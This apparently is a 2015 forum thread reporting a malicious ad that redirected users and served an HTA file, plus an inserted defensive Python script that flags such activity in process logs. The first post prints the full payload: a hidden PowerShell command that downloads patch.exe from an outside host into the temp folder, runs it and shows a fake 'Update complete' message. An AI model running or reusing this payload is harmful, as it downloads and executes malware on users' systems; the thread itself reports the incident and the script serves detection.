neufuse (Veteran), posted December 28, 2015 (edited):

I'm not sure what ad did this, but when ads loaded (only twice now out of all the times I come here in the past week) on this site I got redirected to a "you have a virus" scam page and I had an .HTA file try to run with this payload:

<script>
moveTo(-100,-100);resizeTo(0,0);
a=new ActiveXObject('Wscript.Shell');
a.Run("PowerShell -WindowStyle Hidden $d=$env:temp+'\\mess.exe';(New-Object System.Net.WebClient).DownloadFile('http://955.c8542ip.mixiaportaldovaletudo.net/145127282735050/patch.exe',$d);Start-Process $d;[System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');[system.windows.forms.messagebox]::show('Update complete.','Information',[Windows.Forms.MessageBoxButtons]::OK, [System.Windows.Forms.MessageBoxIcon]::Information);",0,false);
close();
</script>

This is the second time I've seen this happen on this site's main page after ads loaded, on two different systems: one in IE11, one in Chrome.

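A defender's view of the payload in the post above, as an added example that is not part of the original thread: a small triage script that scores process-creation events for the behaviours the payload shows (PowerShell started by a script host, hidden window, web download, a drop into the temp directory, then execution). The event field names, host names, threshold and sample events are assumptions constructed for illustration, and the URL in the sample is a placeholder.

```python
import re

# Command-line traits of the posted payload: hidden window, web download,
# a drop into %TEMP%, then execution of the dropped file.
INDICATORS = {
    "hidden_window": re.compile(r"-w[a-z]*\s+hidden\b", re.I),  # loose: also matches abbreviated -w/-win
    "web_download": re.compile(r"Net\.WebClient|DownloadFile|Invoke-WebRequest", re.I),
    "temp_path": re.compile(r"\$env:temp|%temp%|\\AppData\\Local\\Temp\\", re.I),
    "starts_process": re.compile(r"Start-Process|\bsaps\b", re.I),
}
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe"}  # mshta.exe runs .HTA files

def basename(path):
    return path.lower().rsplit("\\", 1)[-1]

def score_event(event):
    """Return the list of indicators hit by one process-creation event."""
    if basename(event["image"]) not in ("powershell.exe", "pwsh.exe"):
        return []
    hits = [name for name, rx in INDICATORS.items() if rx.search(event["command_line"])]
    if basename(event["parent_image"]) in SCRIPT_HOSTS:
        hits.append("script_host_parent")
    return hits

def triage(events, threshold=3):
    """Keep events that hit at least `threshold` indicators."""
    scored = [(e, score_event(e)) for e in events]
    return [(e["host"], hits) for e, hits in scored if len(hits) >= threshold]

# Constructed sample events; field names are assumptions modelled on
# process-creation logging, and the URL is a placeholder.
SAMPLE_EVENTS = [
    {"host": "ws-01", "parent_image": r"C:\Windows\System32\mshta.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r"PowerShell -WindowStyle Hidden $d=$env:temp+'\mess.exe';"
                     r"(New-Object System.Net.WebClient).DownloadFile('http://placeholder.invalid/patch.exe',$d);"
                     r"Start-Process $d"},
    {"host": "ws-02", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r"powershell.exe -NoProfile -File C:\Scripts\backup.ps1"},
    {"host": "ws-03", "parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r"powershell -Command Invoke-WebRequest https://intranet.invalid/tool.msi -OutFile C:\Installers\tool.msi"},
]

if __name__ == "__main__":
    for host, hits in triage(SAMPLE_EVENTS):
        print(host, ", ".join(hits))
```

Only the first sample event crosses the threshold; an ordinary admin download (ws-03) hits a single indicator and is left alone.
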
The Evil Overlord, posted December 28, 2015 (edited):

Maybe Neowin's trying to tell you something.

I personally hate the ones that auto-play audio (the 'Think' ads).

((Worst part, that ad's now on some sort of loop, and no refreshing or re-navigating is fixing it. At this rate, I may as well install an ad blocker also.))

Torolol, posted December 28, 2015:

I got an HTTP 502 error when I wanted to download that file for antivirus inspection.

binaryzero, posted December 28, 2015:

Seems legit.

Steven P. (Administrators), posted December 28, 2015:

Reporting this, will let you know the results.

neufuse (Veteran, Author), posted December 28, 2015:

12 hours ago, Torolol said:
> I got an HTTP 502 error when I wanted to download that file for antivirus inspection.

Yeah, I tried it yesterday too and got the same thing... but to me, even if it's not getting the file, it is still concerning an ad would be doing this. I wanted to see what the file actually was myself...

8 hours ago, Steven P. said:
> Reporting this, will let you know the results.

Cool, thanks!